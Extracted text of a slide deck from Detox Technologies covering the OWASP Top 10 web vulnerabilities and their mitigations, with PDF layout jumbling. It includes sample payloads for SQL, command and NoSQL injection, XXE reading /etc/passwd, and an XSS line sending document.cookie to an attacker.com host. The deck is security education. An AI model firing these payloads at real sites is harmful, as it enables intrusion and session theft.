OWASP TOP 10

ATTACKS AND
MITIGATION

Detox Technologies
OWASP Top 10 - OWASP Top 10 -
2013 2017
1. Injection 1. Injection
2. Broken Authentication and 2. Broken Authentication
Session Management
3. Sensitive Data Exposure
3. Cross-Site Scripting (XSS)
4. XML External Entities (XXE)
4. Insecure Direct Object
References (IDOR) 5. Broken Access Control
5. Security Misconfiguration 6. Security Misconfiguration
6. Sensitive Data Exposure 7. Cross-Site Scripting (XSS)
7. Missing Function Level Access 8. Insecure Deserialization.
Control
9. Using Components with
8. Cross Site Request Forgery Known Vulnerabilities
(CSRF)
10. Insufficient Logging &
9. Using Components with Known
Monitoring
Vulnerabilities
10. Unvalidated Redirects and
Forwards
INJECTION
Any attack of tricking the interpreter at
backend to serve any unauthorized data or
perform any unauthorized action

Command Injection
OS Injection

LDAP Injection

SQL Injection
SQL Injection
 EXAMPLES

 String query = "SELECT * FROM accounts WHERE custID='" +

request.getParameter("id") + “’”;
 <?php system(“cat /etc/passwd”) ?>
 Ping 127.0.0.1 | ifconfig
 admin*)((|userpassword=*)
 {"username": {"$ne": null}, "password": {"$ne": null}}
Mitigation

API

PARAMETERIZED QUERY

PREPARED STATEMENTS

WHITELIST CHARACTERS

ENCODING

LENGTH LIMITING
BROKEN AUTHENTICATION• User authentication credentials aren’t
properly protected when stored using
hashing or encryption

• Session IDs are exposed in the URL

• Session IDs aren’t rotated after successful

login

• OTP can be bruteforced

What • Passwords, session IDs, and other

credentials are sent over unencrypted
How
channels
 MITIGATIONS

 Strong Password
 Secure Channel
 Properly Implemented MFA
 Server Issued Session ID with High Entropy
 Logical Vulnerabilities to avoid session hijacking
 Avoid XSS
 SENSITIVE DATA EXPOSURE
 What is your sensitive data
 How is it stored
 How it is attacked
An application encrypts credit card numbers in a database using
automatic database encryption. However, this data is automatically
decrypted when retrieved, allowing a SQL injection flaw to retrieve
credit card numbers in clear text. Alternatives include not storing
credit card numbers, using tokenization, or using public key
encryption.

The password database uses unsalted hashes to store everyone’s

passwords. A file upload flaw allows an attacker to retrieve the
password data. All of the unsalted hashes can be exposed with a
rainbow table of precalculated hashes.
 Don’t store sensitive data unnecessarily
 Strong Encryption algorithm
 Secure data in transit
 Strong policies in Place

MITIGATIONS
 XML EXTERNAL ENTITIES
 What is XXE
 Who can be attacked
 What can XXE Do
<?xml version="1.0" encoding="ISO-8859-
 How to attack 1"?> <!DOCTYPE foo [ <!ELEMENT foo
ANY > <!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>

<!ENTITY xxe SYSTEM "https://192.168.1.1/private"

>]>
 Don’t Use XML until Necessary
 Update SOAP to SOAP 1.2
 Disable XML External Entity and DTD processing in parsers
 Whitelisting
 WAF

MITIGATIONS
BROKEN ACCESS CONTROL (BAC)

 What are Access Controls Allowing the primary key to be

changed to another users
 What is BAC record, permitting viewing or
 What can BAC lead to editing someone else's
account.

Elevation of privilege. Acting as a

user without being logged in, or
acting as an admin when logged in as
a user
CORS misconfiguration
Force browsing to authenticated allows unauthorized
pages as an unauthenticated API access.
user or to privileged pages as a
standard user. Accessing API
with missing access controls for
POST, PUT and DELETE
 Deny by default
 Rate limiting
 Minimize CORS usage
 Proper JWT implementation
 Strong Session Cookie

MITIGATIONS
 Unnecessary ports/pages open
 Improper Error Handling
 Lack of security headers
 Outdated versions of technologies/tools/libraries/plugins
 Default accounts and passwords in place
 Logical and business vulnerabilities

SECURITY MISCONFIGURATION
MITIGATION

 Secure Development lifecycle

 Security Hardening
 Automated process/checklist to follow after certain time
intervals
 Security Headers in place
 Updated Technologies
 XSS
 Why does XSS occur
 Stored
 Reflected
<img \x00src=x
 DOM onerror="alert(1)">
 Blind
http://example.com/index.
php?
p=<script>alert(0);</scri
pt>
'><script>document.loc
ation='http://www.attack
er.com/cgi-
bin/cookie.cgi?
foo='+document.cookie
</script>'.
 Whitelisting
 Character Encoding
 Content-Security-policy header
 Update outdated versions
 Escaping

MITIGATIONS
 INSECURE
DESERIALIZATION

 What is serialization
 What can insecure deserialization do

Create an admin user in

PHP service using
serialization:
a:4:
{i:0;i:1;i:1;s:5:"Alice";i:2;s:5
:"admin";i:3;s:32:"b6a8b3be
a87fe0e05022f8f3c88bc960
";}
 Isolation
 Static Code Analysis
 Whitelist characters
 Actively monitor deserialization

MITIGATIONS
 USING COMPONENTS WITH KNOWN
VULNERABILITIES
 Server
 Plugins
 Services
Functions vulnerable to
 Libraries buffer overflow
 Languages
Apache 1.x

Tomcat 7.x

IIS 6.0
SSH 2.x Vulnerable WP
plugins
 Update
 Discard outdated
 Constantly monitor

MITIGATION
INSUFFICIENT LOGGING AND
MONITORING
Logging vs Monitoring
Why is logging Necessary
An attacker uses scans for users using a
common password. They can take over all
accounts using this password. For all other
users, this scan leaves only one false login
behind. After some days, this may be
repeated with a different password.
A major US retailer
reportedly had an internal
malware analysis sandbox
analyzing attachments. The
sandbox software had
detected potentially
unwanted software, but no
one responded to this
detection. The sandbox had
been producing warnings
for some time before the
breach was detected due to
fraudulent card transactions
by an external bank.
 Best Practices
 Backups
 IDS/IPS
 Centralized Access

MITIGATIONS
CONCLUSION
THANK YOU